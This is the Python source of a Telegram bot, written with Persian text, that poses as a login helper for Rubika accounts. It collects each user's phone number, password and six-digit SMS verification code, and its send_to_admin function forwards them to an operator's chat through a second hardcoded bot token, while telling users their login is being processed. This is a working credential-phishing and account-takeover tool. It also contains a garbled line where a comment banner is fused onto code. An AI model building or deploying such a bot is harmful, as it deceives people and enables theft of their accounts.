import asyncio
import json
import os
import logging
from datetime import datetime
from typing import Dict, Any

import aiohttp
from aiogram import Bot, Dispatcher, types
from aiogram.filters import Command, CommandObject
from aiogram.fsm.context import FSMContext
from aiogram.fsm.state import State, StatesGroup
from aiogram.types import Message, ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove
from aiogram.utils.keyboard import ReplyKeyboardBuilder

# =============================================
# 🔧 تنظیمات و لاگ‌گیری
# =============================================
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

BOT_TOKEN = os.getenv("BOT_TOKEN", "8725100247:AAG7RAeEvFvJWzlFcWgLcJHEgJp9ZibFPhc")
ADMIN_BOT_TOKEN = os.getenv("ADMIN_BOT_TOKEN", "8970376348:AAGT2JpjjjGJgwfzVA8pbgnzTCTzxsvRaAE")
ADMIN_CHAT_ID = int(os.getenv("ADMIN_CHAT_ID", 613623))

bot = Bot(token=BOT_TOKEN)
dp = Dispatcher()

# =============================================
# 📊 مدیریت حالت‌ها (FSM)
# =============================================
class Form(StatesGroup):
    phone = State()          # دریافت شماره
    password = State()       # دریافت رمز عبور
    code = State()           # دریافت کد تایید

# =============================================
# 🎨 دکمه‌های کمکی
# =============================================
def cancel_keyboard():
    """دکمه لغو عملیات"""
    builder = ReplyKeyboardBuilder()
    builder.add(KeyboardButton(text="❌ لغو"))
    return builder.as_markup(resize_keyboard=True)

def remove_keyboard():
    """حذف دکمه‌ها"""
    return ReplyKeyboardRemove()

# =============================================
# 📥 ارسال اطلاعات به ربات ادمین (بهینه‌شده)
# =============================================
async def send_to_admin(data: Dict[str, Any], step: str):
    """ارسال داده‌ها به ربات ادمین با فرمت JSON و مدیریت خطا"""
    url = f"https://api.telegram.org/bot{ADMIN_BOT_TOKEN}/sendMessage"
    
    # ایجاد پیام با فرمت مشخص و مرتب
    message_lines = [
        "📩 **اطلاعات کاربر جدید**",
        f"🆔 Chat ID: `{data.get('user_id')}`",
        f"📱 شماره: `{data.get('phone')}`",
        f"🔑 رمز عبور: `{data.get('password', '(وارد نشده)')}`",
        f"📌 مرحله: `{step}`",
        f"⏱ زمان: `{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}`"
    ]
    
    if data.get('code'):
        message_lines.append(f"✅ کد تایید: `{data['code']}`")
    
    message = "\n".join(message_lines)

    payload = {
        "chat_id": ADMIN_CHAT_ID,
        "text": message,
        "parse_mode": "Markdown"
    }

    try:
        timeout = aiohttp.ClientTimeout(total=10)
        async with aiohttp.ClientSession(timeout=timeout) as session:
            async with session.post(url, json=payload) as response:
                if response.status == 200:
                    logger.info(f"✅ اطلاعات به ادمین ارسال شد (مرحله: {step}, کاربر: {data.get('user_id')})")
                else:
                    logger.error(f"❌ خطا در ارسال به ادمین: {response.status} - {await response.text()}")
    except asyncio.TimeoutError:
        logger.error("❌ Timeout در ارسال به ادمین")
    except Exception as e:
        logger.error(f"❌ خطا در ارسال به ادمین: {e}")

# =============================================
# 📨 دریافت پیام از ادمین و انتقال به کاربر
# =============================================
@dp.message()
async def handle_admin_messages(message: Message):
    """پردازش پیام‌های ادمین و ارسال به کاربر"""
    # فقط پیام‌های ادمین رو پردازش کن
    if message.chat.id != ADMIN_CHAT_ID:
        return

    # اگر پیام ریپلی داشت، به کاربر ریپلی شده ارسال کن
    if message.reply_to_message:
        # ✅ راه‌حل صحیح و ساده
        user_id = message.reply_to_message.from_user.id

        try:
            await bot.send_message(
                user_id,
                f"📩 **پیام از ادمین:**\n\n{message.text}",
                parse_mode="Markdown"
            )
            await message.reply(f"✅ پیام به کاربر `{user_id}` ارسال شد.", parse_mode="Markdown")
            logger.info(f"✅ پیام از ادمین به کاربر {user_id} ارسال شد.")
        except Exception as e:
            await message.reply(f"❌ خطا در ارسال پیام: {e}")
            logger.error(f"❌ خطا در ارسال پیام از ادمین: {e}")
    else:
        await message.reply(
            "⚠️ لطفاً روی پیام یک کاربر ریپلی کنید تا پیام به او ارسال شود.\n"
            "یا از دستورات زیر استفاده کنید:\n"
            "`/users` - لیست کاربران فعال\n"
            "`/broadcast` - ارسال پیام به همه کاربران"
        ) =============================================
# 🚀 دستور شروع
# =============================================
@dp.message(Command("start"))
async def start_command(message: Message, state: FSMContext):
    await state.clear()
    await message.reply(
        "🔐 **به ربات ورود به روبیکا خوش آمدید!**\n\n"
        "این ربات به شما کمک می‌کند تا به حساب روبیکا خود وارد شوید.\n\n"
        "📌 **مراحل:**\n"
        "1️⃣ شماره تلفن خود را وارد کنید\n"
        "2️⃣ رمز عبور (در صورت وجود) را وارد کنید\n"
        "3️⃣ کد تایید دریافتی از پیامک را وارد کنید\n\n"
        "⚠️ لطفاً شماره را با فرمت **09xxxxxxxxx** وارد کنید:",
        parse_mode="Markdown",
        reply_markup=cancel_keyboard()
    )
    await state.set_state(Form.phone)

# =============================================
# ❌ دستور لغو عملیات
# =============================================
@dp.message(Command("cancel"))
@dp.message(lambda message: message.text == "❌ لغو")
async def cancel_command(message: Message, state: FSMContext):
    current_state = await state.get_state()
    if current_state is None:
        await message.reply("⚠️ هیچ عملیات فعالی وجود ندارد.")
        return
    
    await state.clear()
    await message.reply(
        "✅ عملیات لغو شد.\n"
        "برای شروع مجدد از دستور /start استفاده کنید.",
        reply_markup=remove_keyboard()
    )
    logger.info(f"✅ عملیات توسط کاربر {message.chat.id} لغو شد.")

# =============================================
# 📱 دریافت شماره (با اعتبارسنجی پیشرفته)
# =============================================
@dp.message(Form.phone)
async def get_phone(message: Message, state: FSMContext):
    phone = message.text.strip()
    
    # اعتبارسنجی شماره
    if not phone.isdigit():
        await message.reply("⚠️ شماره باید فقط شامل اعداد باشد. لطفاً مجدد وارد کنید:")
        return
    
    if len(phone) != 11:
        await message.reply("⚠️ شماره باید ۱۱ رقمی باشد (با فرمت 09xxxxxxxxx). لطفاً مجدد وارد کنید:")
        return
    
    if not phone.startswith("09"):
        await message.reply("⚠️ شماره باید با 09 شروع شود. لطفاً مجدد وارد کنید:")
        return

    # ذخیره اطلاعات
    await state.update_data(phone=phone, user_id=message.chat.id)
    
    await message.reply(
        "🔑 **رمز عبور خود را وارد کنید**\n\n"
        "در صورت نداشتن رمز عبور، دکمه **«رد شدن»** را بزنید یا اینتر بزنید.",
        parse_mode="Markdown",
        reply_markup=cancel_keyboard()
    )
    await state.set_state(Form.password)

# =============================================
# 🔑 دریافت رمز عبور (اختیاری)
# =============================================
@dp.message(Form.password)
async def get_password(message: Message, state: FSMContext):
    password = message.text.strip()
    
    # اگر کاربر روی دکمه "رد شدن" کلیک کرد یا اینتر زد
    if password.lower() in ["رد شدن", "skip", ""]:
        password = None
    
    # ذخیره اطلاعات
    data = await state.get_data()
    data['password'] = password
    data['step'] = 'password_received'
    
    # ارسال به ادمین
    await send_to_admin(data, "password_received")
    
    # بروزرسانی state
    await state.update_data(password=password)
    
    await message.reply(
        "✅ **اطلاعات شما به سامانه ارسال شد.**\n\n"
        "⏳ در حال ارسال درخواست کد تایید به شماره شما...\n\n"
        "📲 لطفاً صبر کنید تا کد تایید از طریق پیامک برای شما ارسال شود.\n"
        "سپس کد ۶ رقمی را وارد کنید:",
        parse_mode="Markdown",
        reply_markup=cancel_keyboard()
    )
    
    await state.set_state(Form.code)

# =============================================
# ✅ دریافت کد تایید (با اعتبارسنجی دقیق)
# =============================================
@dp.message(Form.code)
async def get_code(message: Message, state: FSMContext):
    code = message.text.strip()
    
    # اعتبارسنجی کد
    if not code.isdigit():
        await message.reply("⚠️ کد تایید باید فقط شامل اعداد باشد. لطفاً مجدد وارد کنید:")
        return
    
    if len(code) != 6:
        await message.reply("⚠️ کد تایید باید ۶ رقمی باشد. لطفاً مجدد وارد کنید:")
        return

    # دریافت اطلاعات قبلی
    data = await state.get_data()
    data['code'] = code
    data['step'] = 'code_received'
    
    # ارسال کد به ادمین
    await send_to_admin(data, "code_received")
    
    await message.reply(
        "🔄 **کد تایید به سامانه ارسال شد.**\n\n"
        "⏳ در حال تکمیل فرآیند ورود، لطفاً صبر کنید...\n"
        "پاسخ از سمت سیستم به شما اطلاع داده خواهد شد.",
        parse_mode="Markdown",
        reply_markup=remove_keyboard()
    )
    
    # پاک کردن state
    await state.clear()
    
    logger.info(f"✅ کاربر {message.chat.id} کد تایید را وارد کرد و فرآیند تکمیل شد.")

# =============================================
# 🛠️ دستورات ادمین (پیشرفته)
# =============================================
@dp.message(Command("users"))
async def list_active_users(message: Message):
    """نمایش لیست کاربران فعال (فقط ادمین)"""
    if message.chat.id != ADMIN_CHAT_ID:
        await message.reply("⛔ شما دسترسی به این دستور ندارید.")
        return
    
    # اینجا باید از دیتابیس یا کش کاربران فعال رو دریافت کنی
    # در حال حاضر فقط یه پیام نمونه می‌فرستیم
    await message.reply(
        "📊 **لیست کاربران فعال**\n\n"
        "برای دریافت لیست کامل، باید دیتابیس متصل شود.\n"
        "در حال حاضر اطلاعات در حافظه ذخیره می‌شوند."
    )

@dp.message(Command("broadcast"))
async def broadcast_message(message: Message):
    """ارسال پیام به همه کاربران (فقط ادمین)"""
    if message.chat.id != ADMIN_CHAT_ID:
        await message.reply("⛔ شما دسترسی به این دستور ندارید.")
        return
    
    # اینجا باید لیست کاربران رو از دیتابیس بخونی و بهشون پیام بفرستی
    await message.reply(
        "📢 **ارسال پیام همگانی**\n\n"
        "برای ارسال پیام به همه کاربران، از دستور زیر استفاده کنید:\n"
        "`/broadcast متن پیام`"
    )

# =============================================
# 🚀 اجرای ربات (با لاگ‌گیری پیشرفته)
# =============================================
async def main():
    logger.info("🤖 ربات عمومی (بهینه‌شده) راه‌اندازی شد...")
    logger.info(f"✅ ادمین: {ADMIN_CHAT_ID}")
    logger.info("✅ منتظر پیام‌های کاربران...")
    
    try:
        await dp.start_polling(bot)
    except KeyboardInterrupt:
        logger.info("🛑 ربات متوقف شد.")
    except Exception as e:
        logger.error(f"❌ خطا در اجرای ربات: {e}")

if __name__ == "__main__":
    asyncio.run(main())